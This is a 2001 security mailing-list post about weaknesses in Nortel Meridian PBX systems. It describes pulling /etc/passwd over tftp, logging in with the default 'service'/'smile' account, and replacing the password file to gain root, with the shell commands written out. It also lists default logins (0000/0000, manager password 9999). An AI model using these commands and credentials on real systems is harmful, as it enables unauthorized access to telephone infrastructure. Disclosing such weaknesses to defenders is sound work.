Re: Nortel Security

[H D Moore <hdm () secureaustin com>]

If the PBX is hooked into the actual network, there are quite a few ways to 
get access to the system.  The easiest method is to tftp the /etc/passwd file 
off the system and crack the hashes.  If you go this route, you will get a 
user account called "service" with a password of "smile" ;)  If you log into 
the system with this account, you will notice that /etc is mode 0777, so 
getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software 
that came with it was called "Meridian Terminal Emulator".  You could manage 
the PBX with this by first logging in with 0000/0000 then giving it the 
manager password of "9999".  I really wish I had more time to write up the 
stuff I find out there... 

-HD


On Saturday 30 June 2001 06:22 am, G A Evans wrote:
> Try
>
> http://support.dialogic.com/
>
> and search for meridian. There is quite a bit of programming information.
>
> You can also try a login of 0000 and password of 0000 for the Nortel
> Meridian 1 PBX OS Release 2.
>
> Tony Barnett
>
> abarnettremovethisbit () ndirect co uk

--------------------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:

https://alerts.securityfocus.com/